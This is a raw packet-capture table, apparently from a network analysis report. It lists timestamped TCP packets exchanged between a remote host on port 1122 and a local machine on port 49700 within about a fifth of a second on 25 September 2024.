                                  Sep 25, 2024 01:11:12.587413073 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587428093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587443113 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587449074 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.587482929 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.587570906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587585926 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587600946 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587616920 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587620020 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.587634087 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587649107 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587656021 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.587665081 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587697983 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.587867022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587887049 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587903023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587909937 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.587918997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587934971 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.587946892 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.587970972 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588007927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588073015 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588098049 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588112116 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588125944 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588129044 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588146925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588146925 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588195086 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588335991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588351011 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588366985 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588380098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588395119 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588396072 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588411093 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588422060 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588428020 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588445902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588449955 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588479996 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.588597059 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588614941 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.588654041 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657038927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657058001 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657073021 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657154083 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657162905 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657177925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657193899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657211065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657212019 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657233953 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657294989 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657340050 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657426119 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657439947 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657454967 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657469988 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657481909 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657484055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657501936 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657505989 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657516956 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657540083 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657699108 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657741070 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657819986 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657843113 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657859087 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657875061 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657887936 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.657891989 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.657916069 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.658066034 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.658085108 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.658111095 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.665580034 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.665608883 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.665622950 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.665627003 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.665668964 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.665754080 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.665771008 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.665785074 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.665800095 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.665808916 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.665863991 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.665905952 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666038036 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666052103 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666065931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666073084 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.666089058 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666100979 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.666105032 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666121960 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666141987 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.666306973 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666346073 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.666598082 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666729927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666743040 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666757107 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666765928 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.666773081 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666790962 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.666876078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666891098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666906118 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.666913033 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.666944027 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.667514086 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667546034 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667561054 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667592049 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.667682886 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667697906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667714119 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667721987 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.667766094 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.667807102 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667949915 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667964935 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667979002 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.667987108 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.667995930 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668011904 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668015957 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668026924 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668064117 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668237925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668253899 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668267965 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668279886 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668292046 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668306112 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668474913 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668489933 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668504000 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668514013 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668519974 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668535948 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668541908 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668581009 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668778896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668792963 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668807983 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668823957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668831110 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668838978 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668853045 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668858051 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668869019 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668884039 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.668894053 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.668924093 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.673495054 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673507929 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673522949 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673554897 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.673588037 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673604012 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673629045 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.673666954 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673682928 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673717022 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.673748016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.673796892 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674065113 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674154997 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674169064 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674190998 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674205065 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674216986 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674220085 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674231052 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674267054 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674316883 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674331903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674345016 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674359083 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674376011 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674393892 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674470901 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674485922 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674500942 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674514055 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674525023 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674556971 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674603939 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674617052 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674633980 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674653053 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674655914 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674693108 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674742937 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674757004 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674777985 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674791098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674804926 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674809933 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674834013 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674873114 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.674911022 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.674988985 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675003052 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675024033 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675036907 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675038099 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675055027 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675069094 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675072908 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675087929 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675103903 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675117016 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675215006 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675262928 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675278902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675317049 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675365925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675379992 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675420046 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675489902 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675504923 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675518990 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675533056 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675544024 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675548077 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675563097 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.675565958 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.675604105 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.743829966 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.743859053 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.743871927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.743911028 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.743979931 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.743995905 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744010925 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744019985 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744029999 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744045973 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744163990 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744199991 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744213104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744280100 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744294882 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744308949 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744323969 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744342089 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744437933 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744452953 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744477034 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744492054 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744507074 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744508028 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744523048 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744533062 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744539022 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744580984 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744805098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744821072 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744853973 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.744901896 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744916916 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.744961023 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752362013 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752410889 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752417088 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752424955 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752477884 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752501965 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752515078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752530098 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752545118 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752556086 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752579927 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752625942 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752671957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752686977 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752712965 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752789974 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752826929 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752875090 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752890110 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752904892 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752919912 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752926111 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.752937078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.752954006 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.753113031 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753150940 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.753508091 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753532887 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753546953 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753567934 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.753679037 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753694057 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753709078 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753719091 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.753726959 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753746986 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.753840923 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.753876925 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.754332066 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754355907 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754370928 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754394054 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.754488945 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754504919 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754520893 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754528999 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.754555941 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.754637003 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754652023 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754672050 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754688978 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.754873991 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754887104 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754900932 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754908085 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.754916906 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754931927 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754935980 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.754947901 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.754975080 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.755147934 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755163908 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755178928 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755187035 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.755196095 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755211115 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755214930 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.755234957 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755255938 CEST497001122192.168.2.794.156.68.124
                                  Sep 25, 2024 01:11:12.755547047 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755562067 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755577087 CEST11224970094.156.68.124192.168.2.7
                                  Sep 25, 2024 01:11:12.755590916 CEST11224970094.156.68.124192.168.2.7
